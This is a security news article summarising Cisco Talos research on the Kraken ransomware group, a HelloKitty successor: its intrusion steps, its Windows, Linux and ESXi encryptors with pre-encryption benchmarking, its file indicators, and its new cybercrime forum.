HelloKitty Successor Kraken Ransomware Hits Windows/ESXi, Benchmarks Victim Performance Before Encryption

Cisco Talos has released a detailed new analysis showing that the Kraken ransomware group—a successor to the infamous HelloKitty cartel—is rapidly expanding its operations, adopting advanced tooling, and targeting enterprise systems across Windows, Linux, and VMware ESXi environments.

Kraken has already been implicated in attacks across the United States, United Kingdom, Canada, Denmark, Panama, and Kuwait—reflecting broad, opportunistic targeting rather than a focus on any specific sector.

Talos notes that Kraken first appeared in February 2025 and uses the same extortion infrastructure style as its predecessor, “Kraken, a Russian-speaking gang, is suspected to have emerged from the ashes of the HelloKitty ransomware cartel or to have been established by some of its former members.”

Both groups even use the same ransom note filename, reinforcing the overlap. Kraken’s leak site plays a central role in its extortion strategy, “Kraken also operates a data leak site to disclose the stolen data of victims who do not meet their ransom demands.”

In one case investigated by Talos, the group demanded $1 million in Bitcoin, stating that victims must pay to prevent their data from being posted publicly.

One of the analyzed intrusions shows Kraken exploiting exposed SMB services, “Talos observed in one intrusion that the Kraken actor exploited Server Message Block (SMB) vulnerabilities for initial access.”

After breaching the first server, Kraken:

• Extracted administrator credentials
• Logged back in via Remote Desktop
• Installed Cloudflared to create a persistent reverse tunnel
• Deployed SSHFS to quietly exfiltrate sensitive data

Talos reports,  “The attacker established a persistent connection by installing the Cloudflared tool and configuring a reverse tunnel… Additionally, the attacker installed the SSHFS tool… to exfiltrate sensitive data.”

Only after stealing data did the actors unleash the encryption stage—standard practice in double-extortion playbooks.

Cisco Talos emphasizes Kraken’s broad targeting capabilities, “Kraken is a cross-platform ransomware with distinct encryptors for Windows, Linux, and VMware ESXi, targeting a wide range of enterprise environments.” This versatility allows Kraken to hit hybrid, multi-operating-system enterprises with a single toolset.

Kraken appends the .zpsc extension to encrypted files and drops a ransom note titled: readme_you_ws_hacked.txt. In that note, Talos says the threat actor “threatens the victims by stating that they have stolen and encrypted their confidential data.”

Among Kraken’s more unusual capabilities is its ability to evaluate a victim’s system performance before deciding how aggressively to encrypt.

Talos notes, “Kraken ransomware benchmarks a victim machine before starting the encryption process, a feature rarely seen in ransomware.”

By determining whether to perform full or partial encryption based on CPU/IO throughput, Kraken maximizes damage while minimizing the chance of detection through performance spikes. This benchmarking feature is available across both the Windows and Linux/ESXi encryptors.

Kraken’s encryption modules are extensive and highly configurable:

• Encrypt local and removable drives
• Encrypt SQL Server database files
• Encrypt network shares
• Encrypt Hyper-V virtual machines via PowerShell
• Disable backup services
• Delete shadow copies
• Perform multi-threaded operations across directories

Talos highlights Kraken’s operational flexibility, “This ransomware offers extensive command-line options, providing operational flexibility… with features that allow for the encryption of specific files, including SQL databases and network shares.”

Windows and Linux versions also include obfuscation, anti-analysis techniques, and self-cleanup routines to make forensic recovery difficult.

In a move that signals organizational growth, Kraken is attempting to build its own darknet community.

According to Talos, “Talos also observed the announcement of a new underground forum, ‘The Last Haven Board,’ on Kraken’s data leak blog, aimed at creating an anonymous and secure communication channel for the cybercrime underground.”

The Last Haven Board is said to have support from:

• Former HelloKitty affiliates
• The WeaCorp exploit-buying group

This suggests Kraken is trying to position itself not just as a ransomware group—but as an ecosystem hub for cybercriminal activity.

Related Posts:

• CertiK Issues Public Apology to Kraken Over $3M Bug Bounty Incident
• AFP Seizes $9.3 Million in Cryptocurrency from Encrypted Platform Operator in Major Organised Crime Bust
• Midnight Ransomware Decryption Flaw: Babuk Successor’s RSA Implementation Mistake Allows Free File Recovery
• Apache ActiveMQ Servers Exploited by HelloKitty Ransomware
• Source code for HelloKitty ransomware 2020 variant leaked on cybercrime forum